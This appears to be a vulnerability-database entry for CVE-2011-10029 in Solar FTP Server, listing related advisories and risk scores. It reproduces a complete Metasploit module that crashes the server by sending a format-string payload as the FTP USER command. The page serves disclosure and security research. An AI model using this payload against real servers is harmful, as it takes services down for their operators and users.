Lucene search
+L

Solar FTP Server Malformed USER Denial of Service

Solar FTP Server Malformed USER Denial of Service This module will send a format string as USER to Solar FTP, causing a READ violation in function "__output_1()" found in "sfsservice.exe" while trying to calculate the length of the string. This vulnerability affects versions 2.1.1 and earlier

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2011-10029
20 Aug 202515:40
attackerkb
circl
Circl
CVE-2011-10029
29 May 201815:50
circl
cnnvd
CNNVD
Flexbyte Solar FTP Server 安全漏洞
20 Aug 202500:00
cnnvd
cve
CVE
CVE-2011-10029
20 Aug 202515:40
cve
cvelist
Cvelist
CVE-2011-10029 Solar FTP Server <= 2.1.1 Malformed USER Denial of Service
20 Aug 202515:40
cvelist
euvd
EUVD
EUVD-2011-5252
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-10029
20 Aug 202516:15
nvd
openvas
OpenVAS
SolarFTP USER Command Remote DoS Vulnerability
4 Mar 201100:00
openvas
ptsecurity
Positive Technologies
PT-2025-34110 · Undefined · Undefined
20 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2011-10029
22 Aug 202516:35
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solar FTP Server Malformed USER Denial of Service',
        'Description' => %q{
          This module will send a format string as USER to Solar FTP, causing a
          READ violation in function "__output_1()" found in "sfsservice.exe"
          while trying to calculate the length of the string. This vulnerability
          affects versions 2.1.1 and earlier.
        },
        'Author' => [
          'x000 <3d3n[at]hotmail.com.br>', # Initial disclosure/exploit
          'C4SS!0 G0M3S <Louredo_[at]hotmail.com>',  # Metasploit submission
          'sinn3r',                                  # Metasploit edit/commit
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-10029' ],
          [ 'EDB', '16204' ],
        ],
        'DisclosureDate' => '2011-02-22',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(21)
      ]
    )
  end

  def run
    connect

    banner = sock.get_once(-1, 10) || ''
    print_status("Banner: #{banner.strip}")

    buf = Rex::Text.pattern_create(50)
    buf << '%s%lf%n%c%l%c%n%n%n%nC%lf%u%lf%d%s%v%n'
    print_status('Sending format string...')
    sock.put("USER #{buf}\r\n")

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Feb 2011 00:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 48.7
EPSS0.00723
SSVC
14